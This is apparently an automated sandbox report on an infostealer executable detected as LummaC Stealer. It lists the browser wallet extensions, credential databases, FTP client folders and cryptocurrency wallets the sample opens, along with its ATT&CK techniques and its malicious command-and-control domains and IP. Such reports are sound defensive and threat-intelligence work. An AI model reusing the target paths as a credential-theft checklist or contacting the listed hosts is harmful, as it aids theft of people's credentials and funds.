Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match

File source: Process Memory Space: vPqd8HLs88.exe PID: 7868, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: vPqd8HLs88.exe PID: 7868, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
vPqd8HLs88.exe	58%	ReversingLabs	Win32.Infostealer.Tinba
vPqd8HLs88.exe	100%	Avira	HEUR/AGEN.1306978
vPqd8HLs88.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
immureprech.biz	0%	Avira URL Cloud	safe
https://brendon-sharjen.biz/03	100%	Avira URL Cloud	malware
sordid-snaked.cyou	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz:443/apiilesCOMPUTERNAME=user-PCComSpec=C:	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/n	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/pia3	100%	Avira URL Cloud	malware
deafeninggeh.biz	0%	Avira URL Cloud	safe
awake-weaves.cyou	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/i	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/l	100%	Avira URL Cloud	malware
debonairnukk.xyz	0%	Avira URL Cloud	safe
https://brendon-sharjen.biz/api	100%	Avira URL Cloud	malware
diffuculttan.xyz	0%	Avira URL Cloud	safe
https://brendon-sharjen.biz:443/apiOn	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/d	100%	Avira URL Cloud	malware
effecterectz.xyz	0%	Avira URL Cloud	safe
https://brendon-sharjen.biz//	100%	Avira URL Cloud	malware
wrathful-jammy.cyou	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz:443/api	100%	Avira URL Cloud	malware
brendon-sharjen.biz	100%	Avira URL Cloud	malware
https://brendon-sharjen.biz/apid2	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
brendon-sharjen.biz	104.21.32.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sordid-snaked.cyou	true	Avira URL Cloud: malware	unknown
awake-weaves.cyou	true	Avira URL Cloud: malware	unknown
immureprech.biz	true	Avira URL Cloud: safe	unknown
deafeninggeh.biz	true	Avira URL Cloud: safe	unknown
https://brendon-sharjen.biz/api	true	Avira URL Cloud: malware	unknown
debonairnukk.xyz	true	Avira URL Cloud: safe	unknown
diffuculttan.xyz	true	Avira URL Cloud: safe	unknown
effecterectz.xyz	true	Avira URL Cloud: safe	unknown
wrathful-jammy.cyou	true	Avira URL Cloud: malware	unknown
brendon-sharjen.biz	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://brendon-sharjen.biz/pia3	vPqd8HLs88.exe, 00000000.00000002.1667699253.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://brendon-sharjen.biz/i	vPqd8HLs88.exe, 00000000.00000003.1556027423.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://brendon-sharjen.biz:443/apiilesCOMPUTERNAME=user-PCComSpec=C:	vPqd8HLs88.exe, 00000000.00000002.1667413749.00000000005CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://brendon-sharjen.biz/l	vPqd8HLs88.exe, 00000000.00000003.1534699018.00000000005F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://brendon-sharjen.biz/n	vPqd8HLs88.exe, 00000000.00000002.1667413749.000000000057B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://brendon-sharjen.biz/03	vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667699253.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	false		high
https://brendon-sharjen.biz/d	vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://brendon-sharjen.biz:443/apiOn	vPqd8HLs88.exe, 00000000.00000003.1451173593.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451493959.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1452123119.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451751045.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451002983.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451409856.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555134997.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1512030202.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1450946815.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1452325227.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1476087054.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://brendon-sharjen.biz:443/api	vPqd8HLs88.exe, 00000000.00000003.1555845377.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555134997.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1512030202.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1476087054.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000002.1667413749.00000000005CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micro	vPqd8HLs88.exe, 00000000.00000003.1555845377.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534520695.000000000057B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://brendon-sharjen.biz/	vPqd8HLs88.exe, 00000000.00000003.1555845377.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534699018.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511725353.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534497427.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534520695.000000000057B000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1512185514.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511705671.00000000005DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://brendon-sharjen.biz//	vPqd8HLs88.exe, 00000000.00000003.1534699018.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511893340.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511873950.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511705671.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1534744341.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1511854208.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	vPqd8HLs88.exe, 00000000.00000003.1476621669.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://brendon-sharjen.biz/apid2	vPqd8HLs88.exe, 00000000.00000003.1555552889.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	vPqd8HLs88.exe, 00000000.00000003.1478027000.0000000003186000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	vPqd8HLs88.exe, 00000000.00000003.1425961445.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1425897240.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426159310.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.32.1	brendon-sharjen.biz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573709
Start date and time:	2024-12-12 14:25:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vPqd8HLs88.exe renamed because original name is a hash value
Original Sample Name:	074f68cba07911707860af2932fda77dfae0f0eb978cbadc4f8b64cbb9be1579.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 34 Number of non-executed functions: 220
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 4.175.87.197, 20.190.147.3
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: vPqd8HLs88.exe

Simulations

Behavior and APIs

Time	Type	Description
08:26:18	API Interceptor	7x Sleep call for process: vPqd8HLs88.exe modified
08:26:44	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
brendon-sharjen.biz	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.130.33

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ce5ByeDy16.exe	Get hash	malicious	LummaC	Browse	104.21.67.145
	http://stahlrohr.powerappsportals.com	Get hash	malicious	Unknown	Browse	104.18.3.157
	https://cargalia.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWVFczJZems9JnVpZD1VU0VSMjkxMTIwMjRVNDYxMTI5NTU=N0123N	Get hash	malicious	Unknown	Browse	104.21.92.54
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.205.226
	jN6irWtNiG.lnk	Get hash	malicious	Unknown	Browse	104.21.45.53
	yOmgCWM83b.lnk	Get hash	malicious	Unknown	Browse	172.67.210.76
	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.205.226
	http://grastoonm3vides.com	Get hash	malicious	Unknown	Browse	104.21.32.1
	3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	https://www.amberdrinks.lt/	Get hash	malicious	Unknown	Browse	172.67.164.227

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ce5ByeDy16.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	V7CnS4XGYS.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Captcha.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	104.21.32.1
	FSCPlugin06.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
